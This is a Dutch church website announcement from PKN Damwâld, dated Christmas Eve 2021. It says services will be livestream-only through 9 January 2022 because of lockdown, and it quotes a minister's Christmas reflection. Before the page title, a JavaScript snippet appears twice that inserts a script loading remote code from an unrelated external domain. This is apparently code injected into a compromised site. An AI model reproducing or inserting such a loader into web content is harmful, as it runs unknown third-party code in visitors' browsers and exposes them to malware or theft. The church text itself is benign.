;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bericht namens de beide kerkenraden - PKN Damwâld

Bericht namens de beide kerkenraden

Gepubliceerd op: vrijdag 24 december 2021

In verband met de lockdown hebben de beide moderamen helaas moeten besluiten dat alle diensten tot en met 9 januari 2022 in ieder geval alleen via de livestream en kerkradio worden uitgezonden. Alleen de meewerkenden aan de dienst zullen in de kerk aanwezig zijn. Dit is weer even een stap terug, maar gelukkig zijn we via de livestream wel met elkaar verbonden. De dienst op zaterdagmorgen 1 januari vervalt en de middagdienst op 2 januari ook. Er is geen livestream mogelijk vanuit de Bonifatiuskerk. Voor verdere details verwijzen wij u naar de website, De Klok en Ús Tsjerkenijs.
De beide kerkenraden hebben besloten dat vanaf het moment dat we weer met gemeenteleden in de kerk aanwezig kunnen zijn, we met ambtsdragers uit beide kerken in de diensten aanwezig zullen zijn, zowel ’s ochtends als ’s middags. Daarnaast is het belangrijk dat er voor beide gemeenten evenveel aandacht is voor de pastorale zaken tijdens de erediensten. Er zijn daarom afspraken gemaakt dat we bidden voor de gemeenteleden die in het ziekenhuis liggen, die verhuisd zijn naar een verpleegtehuis, voor rouwdragenden en specifiek voor die mensen waar voorbeden voor zijn aangevraagd.
We begrijpen dat voor veel mensen de feestdagen zo nog meer eenzaam zijn, omdat er niet naar de kerk gegaan kan worden. U kunt natuurlijk altijd wel samen met uw buurvrouw/buurman kijken naar de online dienst en deze samen beleven. Laten we omzien naar elkaar, juist nu!

Citaat van onze classis dominee Wim Beekman:
“Klein kerstfeest zal het zijn. Daarin is Lucas ons voorgegaan. Twee ouders op “alle dag”lopend, die over bergen en door dalen trekken om aan het bevel van de keizer te voldoen. Ver van huis zijn en geen plaats vinden in een herberg. Het was een kleine kerstmis, ooit. Genoeg voor herders en engelen, genoeg voor Maria, Jozef en het kind. Genoeg voor ons. Laten we onbekommerd en onbevangen de kleine kerstmis van onze dagen vieren. Moge licht en lied van engelen ons nabij zijn. Moge evangelie en aanbidding van herders ons bemoedigen. Moge de komst van het kind en de geboorte van kinderlijk geloof, hoop en liefde ons getroost het nieuwe jaar indragen.”

We wensen u een gezegend kerstfeest en folle lok en seine yn it nije jier.